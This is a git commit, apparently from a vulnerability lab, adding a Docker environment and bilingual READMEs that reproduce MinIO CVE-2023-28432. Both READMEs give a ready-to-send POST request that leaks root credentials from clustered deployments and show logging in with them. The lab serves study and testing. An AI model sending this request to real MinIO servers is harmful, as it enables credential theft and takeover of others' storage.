first commit

minio/CVE-2023-28432/README.md

@@ -0,0 +1,49 @@
+# MinIO Information Disclosure in Cluster Deployment (CVE-2023-28432)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+MinIO is a High Performance Object Storage released under GNU Affero General Public License v3.0.
+
+In the version before `RELEASE.2023-03-20T20-16-18Z`, there is an information disclosure vulnerability if MinIO is deployed in cluster mode. An attacker can use an HTTP request to obtain all environment variables of the target process, including `MINIO_ROOT_USER` and `MINIO_ROOT_PASSWORD`.
+
+References:
+
+- <https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q>
+- <https://mp.weixin.qq.com/s/GNhQLuzD8up3VcBRIinmgQ>
+
+## Vulnerable Environment
+
+Executing following commands to start a MinIO cluster:
+
+```
+docker compose up -d
+```
+
+After the cluster has been started, you can browse Web console on `http://your-ip:9001`, API server on `http://your-ip:9000`.
+
+## Vulnerability Reproduce
+
+The issue exists in the API endpoint `http://your-ip:9000/minio/bootstrap/v1/verify`. Send the request to retrieve all environment variables:
+
+```
+POST /minio/bootstrap/v1/verify HTTP/1.1
+Host: your-ip:9000
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 0
+
+
+```
+
+![](1.png)
+
+It can be seen that `MINIO_ROOT_USER` and `MINIO_ROOT_PASSWORD` is exposed.
+
+Success to use this username and password to login the Web console:
+
+![](2.png)

minio/CVE-2023-28432/README.zh-cn.md

@@ -0,0 +1,45 @@
+# MinIO集群模式信息泄露漏洞（CVE-2023-28432）
+
+MinIO是一个开源对象存储系统。
+
+在其`RELEASE.2023-03-20T20-16-18Z`版本（不含）以前，集群模式部署下存在一处信息泄露漏洞，攻击者可以通过发送一个POST数据包获取进程所有的环境变量，其中就包含账号密码`MINIO_ROOT_USER`和`MINIO_ROOT_PASSWORD`。
+
+参考链接：
+
+- <https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q>
+- <https://mp.weixin.qq.com/s/GNhQLuzD8up3VcBRIinmgQ>
+
+## 漏洞环境
+
+执行如下命令启动一个MinIO集群，其中包含3个以集群模式运行的服务：
+
+```
+docker compose up -d
+```
+
+集群启动后，访问`http://your-ip:9001`可以查看Web管理页面，访问`http://your-ip:9000`是API服务。
+
+## 漏洞复现
+
+这个漏洞存在于API节点`http://your-ip:9000/minio/bootstrap/v1/verify`上，发送如下数据包即可查看泄露的环境变量：
+
+```
+POST /minio/bootstrap/v1/verify HTTP/1.1
+Host: your-ip:9000
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 0
+
+
+```
+
+![](1.png)
+
+可见，其中包含`MINIO_ROOT_USER`和`MINIO_ROOT_PASSWORD`。使用这个账号密码，即可成功登录管理后台：
+
+![](2.png)

minio/CVE-2023-28432/docker-compose.yml

@@ -0,0 +1,49 @@
+version: '3'
+services:
+  node1:
+    image: vulhub/minio:2023-02-27T18-10-45Z
+    environment:
+      - MINIO_ROOT_USER=minioadmin
+      - MINIO_ROOT_PASSWORD=minioadmin-vulhub
+    command:
+      - minio
+      - server
+      - --console-address
+      - :9001
+      - http://node1:9000/mnt/data1
+      - http://node2:9000/mnt/data2
+      - http://node3:9000/mnt/data3
+    ports:
+      - 9000:9000
+      - 9001:9001
+    hostname: node1
+    volumes:
+      - ./mnt/data1:/mnt/data1
+  node2:
+    image: vulhub/minio:2023-02-27T18-10-45Z
+    environment:
+      - MINIO_ROOT_USER=minioadmin
+      - MINIO_ROOT_PASSWORD=minioadmin-vulhub
+    command:
+      - minio
+      - server
+      - http://node1:9000/mnt/data1
+      - http://node2:9000/mnt/data2
+      - http://node3:9000/mnt/data3
+    hostname: node2
+    volumes:
+      - ./mnt/data2:/mnt/data2
+  node3:
+    image: vulhub/minio:2023-02-27T18-10-45Z
+    environment:
+      - MINIO_ROOT_USER=minioadmin
+      - MINIO_ROOT_PASSWORD=minioadmin-vulhub
+    command:
+      - minio
+      - server
+      - http://node1:9000/mnt/data1
+      - http://node2:9000/mnt/data2
+      - http://node3:9000/mnt/data3
+    hostname: node3
+    volumes:
+      - ./mnt/data3:/mnt/data3

minio/CVE-2023-28432/mnt/data1/.gitignore

@@ -0,0 +1 @@
+.minio.sys

minio/CVE-2023-28432/mnt/data2/.gitignore

@@ -0,0 +1 @@
+.minio.sys

minio/CVE-2023-28432/mnt/data3/.gitignore

@@ -0,0 +1 @@
+.minio.sys